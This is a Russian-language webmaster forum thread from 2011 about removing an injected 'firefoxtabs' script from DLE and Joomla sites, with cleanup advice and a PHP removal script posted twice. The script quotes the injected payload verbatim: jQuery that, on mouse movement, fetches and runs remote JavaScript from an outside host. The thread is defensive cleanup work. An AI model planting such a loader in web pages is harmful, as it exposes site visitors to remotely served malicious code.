Помогите избавиться от вируса на DLE

Что могу сказать по DLE:

Решил проблему заменой JS файлов в шаблоне + заменил папки classes, editor, skins в директории engine из дистрибутива, вроде антивирь пищать перестал.

Для DLE шелл как правило сидит где-то в субдиректориях папки UPLOADS, так что скорее всего надо искать там, если на хосте не один сайт, то шерстить все.

P.S. Выкачивайте все файлы, и программой PowerGREP 4 поиск по слову firefoxtabs, увидите где еще строчка есть

killerok добавил 17.05.2011 в 17:22

Господа "инфицированные" много кто из вас за этот месяц посещал сайт epidem.ru?

Заказал программисту скрипт по авто-удалению вредоносного кода со всех файлов.

Пользуйтесь на здоровья!

<?php 

define ('BR', "<br />\r\n"); 

$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>'; 

$srch2="document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});"; 



function clean_file($file)

{ 

global $srch;

global $srch2; 

    $basename=basename($file); 

    $filename=substr($basename, 0, strrpos($basename, '.')); 

	//print($file.BR);

    

        $f_in=file_get_contents($file); 

        if (strpos($f_in, $srch)!=false) { 

  

  			print("<b>".$file."</b><br>");

            $f_in=str_replace($srch, '', $f_in); 

            file_put_contents($file, $f_in); 

        } 

        if (strpos($f_in, $srch2)!=false) { 

		

            print("<b>".$file."</b><br>");

			

            $f_in=str_replace($srch2, '', $f_in); 

            file_put_contents($file, $f_in); 

        } 

    

} 



function firefoxtabs_remover($dir){ 

    if ($objs = glob($dir."/*")) { 

        foreach($objs as $obj) { 

            if (is_dir($obj)) firefoxtabs_remover($obj); 

            else clean_file($obj); 

        } 

    } 

} 



$dir=realpath('./'); 

firefoxtabs_remover($dir); 

?>

мои методы борьбы были таковы:

1) поставил касперского KIS последний, обновил лицензию, проверил весь комп полной проверкой (12 часов) и быстрой проверкой областей – нашлось около 5 троянов\вирусов – касперыч их потёр.

2) Убил на хосте все «не особо» нужные сайты – оставил тока один тот что важен.

На нём стоит joomla 1.5.15

3) Скопировал всё на комп с ftp, через программу MTP сделал поиск по всем файлам этот код и сделал автозамену на «пробел» – нашлось около 80 файлов заменённых. Залил всё обратно (заливку делал тока тех файлов размер которых изменился – это быстрее)

4) Поменял пароли – сменил их раза 3-4 для верности.

5) все файлы текстовые где хранились пароли – убрал с компа.

всё это было 18 числа, на сегодняшний день проблем нету (слава богу)

<?php 

define ('BR', "<br />\r\n"); 

$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>'; 

$srch2="document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});"; 



function clean_file($file)

{ 

global $srch;

global $srch2; 

    $basename=basename($file); 

    $filename=substr($basename, 0, strrpos($basename, '.')); 

	//print($file.BR);

    

        $f_in=file_get_contents($file); 

        if (strpos($f_in, $srch)!=false) { 

  

  			print("<b>".$file."</b><br>");

            $f_in=str_replace($srch, '', $f_in); 

            file_put_contents($file, $f_in); 

        } 

        if (strpos($f_in, $srch2)!=false) { 

		

            print("<b>".$file."</b><br>");

			

            $f_in=str_replace($srch2, '', $f_in); 

            file_put_contents($file, $f_in); 

        } 

    

} 



function firefoxtabs_remover($dir){ 

    if ($objs = glob($dir."/*")) { 

        foreach($objs as $obj) { 

            if (is_dir($obj)) firefoxtabs_remover($obj); 

            else clean_file($obj); 

        } 

    } 

} 



$dir=realpath('./'); 

firefoxtabs_remover($dir); 

?>

Запускать с корня?

killerok добавил 22.05.2011 в 17:09

Что за прога MTP, дай линк плиз

killerok, Ну если в корень зальете, то да.

1. Рекомендую ограничить доступ к фтп...

2. Написал на перле скрипт, "лечащий" уже зараженные файлы сайтов.

Запускать в консоли так: ./curesite.pl путь_к_сайту

Если у кого нет к хостингу доступа по ssh/telnet, могу модифицировать для запуска через веб...

Респект тебе, давно бы уже написать универсальный чистильщик, который бы удалял нужную строчку как в файлах, так и в БД.

ogt1, у меня к сожалению нет доступа по ssh, не могли бы Вы переделать скрипт для меня (наверно не только для меня).

Заранее спасибо.